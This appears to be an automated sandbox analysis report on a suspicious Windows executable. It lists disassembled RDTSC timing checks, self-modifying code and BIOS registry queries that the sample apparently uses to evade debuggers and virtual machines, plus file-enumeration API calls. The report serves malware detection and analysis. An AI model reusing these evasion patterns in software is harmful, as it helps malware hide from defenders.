                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EBED0 second address: 10EBEE1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB0D4776366h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EC157 second address: 10EC15B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EC15B second address: 10EC176 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB0D4776370h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EC176 second address: 10EC17C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EC17C second address: 10EC198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 ja 00007FB0D4776366h 0x0000000e pop esi 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 pushad 0x00000014 jc 00007FB0D4776366h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EC2A8 second address: 10EC2AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EC2AD second address: 10EC2CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D4776371h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e jp 00007FB0D4776366h 0x00000014 pop ecx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EC2CE second address: 10EC2D3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ECCA3 second address: 10ECCB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jl 00007FB0D4776368h 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ECCB3 second address: 10ECCB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ECCB9 second address: 10ECCC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ECCC1 second address: 10ECCE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB0D4D733D4h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ECCE2 second address: 10ECD04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FB0D4C188D8h 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ECD04 second address: 10ECD09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ECD09 second address: 10ECD13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FB0D4C188C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ED445 second address: 10ED469 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB0D4D733C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FB0D4D733D6h 0x0000000f pushad 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ED469 second address: 10ED484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FB0D4C188D2h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F5518 second address: 10F551C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F551C second address: 10F5520 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F5520 second address: 10F553E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FB0D4D733CEh 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 jnc 00007FB0D4D733C6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F500F second address: 10F5014 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F515C second address: 10F5160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F5160 second address: 10F5166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F5166 second address: 10F516C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F89DC second address: 10F89E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F89E0 second address: 10F89E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F89E6 second address: 10F89EB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F89EB second address: 10F89F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11029E7 second address: 11029EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110260C second address: 1102627 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FB0D4D733CEh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1102627 second address: 110262B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110262B second address: 1102631 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1106FDE second address: 1107009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FB0D4C188CDh 0x0000000b jp 00007FB0D4C188C6h 0x00000011 popad 0x00000012 jl 00007FB0D4C188E6h 0x00000018 pushad 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b jns 00007FB0D4C188C6h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1107009 second address: 1107018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jo 00007FB0D4D733C6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1106A5A second address: 1106A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1106A60 second address: 1106A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB0D4D733CDh 0x0000000a jmp 00007FB0D4D733CCh 0x0000000f pushad 0x00000010 jmp 00007FB0D4D733CDh 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1106C03 second address: 1106C07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1106C07 second address: 1106C0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1106C0B second address: 1106C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10303F3 second address: 10303F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10303F9 second address: 10303FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1117C0E second address: 1117C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1117C14 second address: 1117C1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111F27E second address: 111F28E instructions: 0x00000000 rdtsc 0x00000002 je 00007FB0D4D733C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111F417 second address: 111F41D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111F83D second address: 111F84E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0D4D733CDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111F84E second address: 111F857 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111F993 second address: 111F99A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111F99A second address: 111F9CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0D4C188D5h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e jmp 00007FB0D4C188D1h 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111FB4A second address: 111FB4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1124C9C second address: 1124CAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D4C188CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11266E9 second address: 11266F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11266F7 second address: 11266FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101BCB9 second address: 101BCCB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FB0D4D733C6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11432D5 second address: 11432DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11432DD second address: 11432E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1143186 second address: 1143195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jnc 00007FB0D4C188C6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1144914 second address: 114491E instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB0D4D733C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1146CF4 second address: 1146D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB0D4C188C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007FB0D4C188E0h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114686C second address: 1146870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1146870 second address: 114687E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D4C188CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114687E second address: 1146896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0D4D733D4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1146896 second address: 114689A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114689A second address: 11468B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0D4D733D3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1157164 second address: 11571C3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 jp 00007FB0D4C188C6h 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jno 00007FB0D4C188C6h 0x00000018 jmp 00007FB0D4C188D8h 0x0000001d jne 00007FB0D4C188C6h 0x00000023 popad 0x00000024 jnc 00007FB0D4C188D8h 0x0000002a pushad 0x0000002b popad 0x0000002c jmp 00007FB0D4C188D0h 0x00000031 push esi 0x00000032 jo 00007FB0D4C188C6h 0x00000038 pushad 0x00000039 popad 0x0000003a pop esi 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f push edi 0x00000040 pop edi 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11575C0 second address: 11575DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D4D733D0h 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FB0D4D733C6h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11575DC second address: 11575F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e jnc 00007FB0D4C188C6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11575F0 second address: 1157614 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D4D733CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FB0D4D733D4h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1157AAF second address: 1157AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1157AB4 second address: 1157AB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1157C09 second address: 1157C11 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1157C11 second address: 1157C17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115C110 second address: 115C190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jbe 00007FB0D4C188C8h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007FB0D4C188C8h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d mov edx, dword ptr [ebp+122D2934h] 0x00000033 push 00000004h 0x00000035 push 00000000h 0x00000037 push ebp 0x00000038 call 00007FB0D4C188C8h 0x0000003d pop ebp 0x0000003e mov dword ptr [esp+04h], ebp 0x00000042 add dword ptr [esp+04h], 0000001Bh 0x0000004a inc ebp 0x0000004b push ebp 0x0000004c ret 0x0000004d pop ebp 0x0000004e ret 0x0000004f xor dx, 2D87h 0x00000054 or edx, dword ptr [ebp+122D2B0Eh] 0x0000005a push 1F29F8F8h 0x0000005f pushad 0x00000060 jl 00007FB0D4C188C8h 0x00000066 push edx 0x00000067 pop edx 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115C190 second address: 115C194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115C422 second address: 115C427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115C427 second address: 115C47D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB0D4D733CCh 0x00000008 jbe 00007FB0D4D733C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 clc 0x00000014 movzx edx, di 0x00000017 push dword ptr [ebp+122D1BB4h] 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 call 00007FB0D4D733C8h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a add dword ptr [esp+04h], 0000001Ch 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret 0x00000035 pop eax 0x00000036 ret 0x00000037 mov dh, al 0x00000039 call 00007FB0D4D733C9h 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 jc 00007FB0D4D733C6h 0x00000047 pop eax 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE02E7 second address: 4BE02ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE02ED second address: 4BE02F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE02F1 second address: 4BE0300 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE0300 second address: 4BE0304 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE0304 second address: 4BE030A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE030A second address: 4BE038B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB0D4D733D3h 0x00000009 xor ch, 0000006Eh 0x0000000c jmp 00007FB0D4D733D9h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007FB0D4D733D0h 0x00000018 add al, FFFFFFE8h 0x0000001b jmp 00007FB0D4D733CBh 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 mov ebp, esp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 jmp 00007FB0D4D733CBh 0x0000002e call 00007FB0D4D733D8h 0x00000033 pop eax 0x00000034 popad 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE038B second address: 4BE03C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FB0D4C188CEh 0x00000008 pop eax 0x00000009 mov edx, 5F912266h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB0D4C188D8h 0x00000019 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: EB1A9E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 106014D instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 105EA3C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: EAF062 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1072EFF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C638B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00C638B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C64910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C64910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C5DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00C5DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C5E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00C5E430
